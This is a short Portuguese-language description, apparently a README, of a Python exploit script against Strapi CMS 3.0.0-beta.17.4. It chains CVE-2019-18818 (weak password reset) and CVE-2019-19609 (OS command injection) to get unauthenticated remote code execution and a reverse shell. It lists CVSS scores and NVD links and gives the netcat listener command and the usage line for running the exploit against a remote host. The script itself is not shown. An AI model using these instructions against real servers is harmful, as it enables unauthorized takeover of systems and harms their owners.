
Script de exploração em Python que visa execução remota de código não autenticada no Strapi CMS 3.0.0-beta.17.4 por meio de CVE-2019-18818 e CVE-2019-19609, entregando uma reverse shell.
Este exploit tem como alvo duas vulnerabilidades no Strapi CMS Framework versão 3.0.0-beta-17.4 permitindo execução remota de código não autenticada (RCE).
Mecanismo Fraco de Recuperação de Senha para Senha Esquecida
CVSS: 9.8 - Crítico
Mais detalhes: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
Neutralização Inadequada de Elementos Especiais usados em um Comando do SO ('Injeção de Comando no SO')
CVSS: 7.2 - Alto
Mais detalhes: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
Antes de executar este exploit, inicie um listener netcat na lport que você especificar nas opções abaixo.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>